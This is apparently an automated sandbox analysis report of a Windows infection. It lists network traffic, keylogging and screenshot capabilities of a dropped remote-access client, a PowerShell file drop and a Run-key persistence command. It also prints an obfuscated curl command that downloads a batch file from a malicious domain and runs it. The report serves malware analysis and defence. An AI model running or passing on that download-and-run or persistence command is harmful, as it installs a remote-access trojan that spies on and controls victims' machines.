Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.27:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.42.254:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.140.48.131:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.3.254:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.113.155.207:443 -> 192.168.2.17:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 193.111.208.110:443 -> 192.168.2.17:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.206.121.228:443 -> 192.168.2.17:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.204.88.70:443 -> 192.168.2.17:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.17:49804 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global event hook (focus changed)
Source: C:\Windows\System32\osk.exe Windows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULL Jump to behavior
Installs a global keyboard hook
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4568 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 shell C:\Windows\system32\OskSupport.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 keyboard low level C:\Windows\system32\osk.exe Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4572 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 4284 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 call wnd proc C:\Windows\System32\uiautomationcore.dll Jump to behavior
Source: C:\Windows\System32\osk.exe Windows user hook set: 6740 get message C:\Windows\System32\uiautomationcore.dll Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 37_2_1101F6B0
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard, 37_2_1101F6B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11032EE0 GetClipboardFormatNameA,SetClipboardData, 37_2_11032EE0
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree, 37_2_110321E0
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor, 37_2_110076F0
Installs a global mouse hook
Source: C:\Windows\System32\osk.exe Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe Jump to behavior
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState, 37_2_11113880
Yara detected Keylogger Generic
Source: Yara match File source: 37.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000002.2428248444.0000000011193000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands
barindex
Contains functionalty to change the wallpaper
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA, 37_2_111158B0

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\pcicapi.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\jkosfe\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\PCICL32.DLL Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\client32.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\remcmdstub.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\rgakat\vpnclient2.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Options\msvcr100.dll Jump to dropped file
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115750: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle, 37_2_11115750
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec, 37_2_1115DB40
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 37_2_1102D330
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7E11D8 34_2_00007FFC8B7E11D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7FAB6F 34_2_00007FFC8B7FAB6F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7F3020 34_2_00007FFC8B7F3020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7F7021 34_2_00007FFC8B7F7021
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7EC870 34_2_00007FFC8B7EC870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7EBF85 34_2_00007FFC8B7EBF85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7F2F45 34_2_00007FFC8B7F2F45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7FB759 34_2_00007FFC8B7FB759
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8B7F2F65 34_2_00007FFC8B7F2F65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA325B0 34_2_00007FFC8BA325B0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA44C2D 34_2_00007FFC8BA44C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA84B80 34_2_00007FFC8BA84B80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA453E5 34_2_00007FFC8BA453E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA37A44 34_2_00007FFC8BA37A44
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA42995 34_2_00007FFC8BA42995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA397D0 34_2_00007FFC8BA397D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA4EF08 34_2_00007FFC8BA4EF08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA506EA 34_2_00007FFC8BA506EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA525A1 34_2_00007FFC8BA525A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BA354D5 34_2_00007FFC8BA354D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCC4C55 34_2_00007FFC8BCC4C55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD6C5B 34_2_00007FFC8BCD6C5B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD73CD 34_2_00007FFC8BCD73CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD7A2D 34_2_00007FFC8BCD7A2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCD9BD 34_2_00007FFC8BCCD9BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD703D 34_2_00007FFC8BCD703D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCF031 34_2_00007FFC8BCCF031
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCC5F1B 34_2_00007FFC8BCC5F1B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCC72D 34_2_00007FFC8BCCC72D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCFE6D 34_2_00007FFC8BCCFE6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD661B 34_2_00007FFC8BCD661B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCCE2D 34_2_00007FFC8BCCCE2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD75AD 34_2_00007FFC8BCD75AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCD156D 34_2_00007FFC8BCD156D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCC5529 34_2_00007FFC8BCC5529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCC74C0 34_2_00007FFC8BCC74C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BE1A8D7 34_2_00007FFC8BE1A8D7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF53CD1 34_2_00007FFC8BF53CD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF542CC 34_2_00007FFC8BF542CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF5000A 34_2_00007FFC8BF5000A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF5B049 34_2_00007FFC8BF5B049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BF59C71 34_2_00007FFC8BF59C71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCB341 34_2_00007FFC8BCCB341
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCCB2C2 34_2_00007FFC8BCCB2C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 34_2_00007FFC8BCC00C1 34_2_00007FFC8BCC00C1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110733B0 37_2_110733B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11061C90 37_2_11061C90
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11033010 37_2_11033010
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11163220 37_2_11163220
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11029590 37_2_11029590
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102B5F0 37_2_1102B5F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11167485 37_2_11167485
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110454F0 37_2_110454F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101B760 37_2_1101B760
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111258B0 37_2_111258B0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101BBA0 37_2_1101BBA0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11087C60 37_2_11087C60
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1116DFCB 37_2_1116DFCB
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11070090 37_2_11070090
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11080480 37_2_11080480
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1115E980 37_2_1115E980
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1101C9C0 37_2_1101C9C0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110088AB 37_2_110088AB
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11050D80 37_2_11050D80
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC8A980 37_2_6CC8A980
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB4910 37_2_6CCB4910
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC984F0 37_2_6CC984F0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB4528 37_2_6CCB4528
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCBA063 37_2_6CCBA063
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB4156 37_2_6CCB4156
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA43C0 37_2_6CCA43C0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB3DB8 37_2_6CCB3DB8
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCB3923 37_2_6CCB3923
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC8DBA0 37_2_6CC8DBA0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CC81760 37_2_6CC81760
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCAD70F 37_2_6CCAD70F
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 11146450 appears 616 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CC97C70 appears 34 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CCA9480 appears 52 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 110278E0 appears 47 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CC97A90 appears 56 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 1116F010 appears 37 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 11029450 appears 1009 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CC86F50 appears 155 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 111603E3 appears 41 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CC97D00 appears 120 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CC830A0 appears 48 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 1105DD10 appears 291 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 11081BB0 appears 44 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 11164010 appears 32 times
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: String function: 6CCAF3CB appears 31 times
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.win@57/404@120/19
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11059C50 GetLastError,FormatMessageA,LocalFree, 37_2_11059C50
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges, 37_2_1109D440
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109D4D0 AdjustTokenPrivileges,CloseHandle, 37_2_1109D4D0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize, 37_2_11115B70
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11089150 FindResourceA,LoadResource,LockResource, 37_2_11089150
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 37_2_11127E10
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Mutant created: NULL
Source: C:\Windows\System32\osk.exe Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3584:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz3rpg3v.cj5.ps1 Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: chrome.exe, 00000000.00000002.2473488281.000028EC02ABE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
